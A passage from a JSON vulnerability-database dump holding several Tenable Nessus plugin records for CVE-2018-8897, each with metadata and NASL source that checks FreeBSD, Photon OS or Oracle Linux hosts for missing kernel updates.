'\\n';\n\nsecurity_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T02:18:18", "description": "The MOV SS and POP SS instructions inhibit debug exceptions until the\ninstruction boundary following the next instruction. If that\ninstruction is a system call or similar instruction that transfers\ncontrol to the operating system, the debug exception will be handled\nin the kernel context instead of the user context. Impact : An\nauthenticated local attacker may be able to read sensitive data in\nkernel memory, control low-level operating system functions, or may\npanic the system.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-09T00:00:00", "title": "FreeBSD : FreeBSD -- Mishandling of x86 debug exceptions (521ce804-52fd-11e8-9123-a4badb2f4699)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:FreeBSD"], "id": "FREEBSD_PKG_521CE80452FD11E89123A4BADB2F4699.NASL", "href": "https://www.tenable.com/plugins/nessus/109625", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109625);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-8897\");\n script_xref(name:\"FreeBSD\", value:\"SA-18:06.debugreg\");\n\n script_name(english:\"FreeBSD : FreeBSD -- Mishandling of x86 debug exceptions (521ce804-52fd-11e8-9123-a4badb2f4699)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MOV SS and POP SS instructions inhibit debug exceptions until the\ninstruction boundary following the next instruction. If that\ninstruction is a system call or similar instruction that transfers\ncontrol to the operating system, the debug exception will be handled\nin the kernel context instead of the user context. Impact : An\nauthenticated local attacker may be able to read sensitive data in\nkernel memory, control low-level operating system functions, or may\npanic the system.\"\n );\n # https://vuxml.freebsd.org/freebsd/521ce804-52fd-11e8-9123-a4badb2f4699.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?69624daa\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:FreeBSD\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=11.1<11.1_10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.4<10.4_9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T01:01:33", "description": "An update of the linux package has been released.", "edition": 13, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2018-1.0-0132-(a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897"], "modified": "2020-09-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0132-A_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121836", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0132-(a). The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121836);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/04 11:19:02\");\n\n script_cve_id(\"CVE-2018-8897\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2018-1.0-0132-(a)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-132-a.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8897\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-api-headers-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.130-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.130-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T04:42:22", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.20.7.el7uek]\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) \n{CVE-2018-8897}", "edition": 22, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-09T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4098)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.7.el6uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.7.el7uek", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2018-4098.NASL", "href": "https://www.tenable.com/plugins/nessus/109632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4098.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109632);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/27 13:00:39\");\n\n script_cve_id(\"CVE-2018-8897\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4098)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.20.7.el7uek]\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) \n{CVE-2018-8897}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007675.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007676.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.7.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.20.7.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-8897\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2018-4098\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.7.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.7.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.20.7.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.20.7.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.20.7.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.20.7.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.20.7.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.20.7.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.20.7.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T04:42:21", "description": "Description of changes:\n\n[2.6.39-400.298.7.el6uek]\n- net/rds: Fix endless RNR situation (Hå kon Bugge) [Orabug: 27645402]\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) \n{CVE-2018-8897}", "edition": 22, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-09T00:00:00", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4097)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2018-4097.NASL", "href": "https://www.tenable.com/plugins/nessus/109631", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4097.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109631);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/27 13:00:39\");\n\n script_cve_id(\"CVE-2018-8897\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2018-4097)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.298.7.el6uek]\n- net/rds: Fix endless RNR situation (Hå kon Bugge) [Orabug: 27645402]\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) \n{CVE-2018-8897}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007677.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 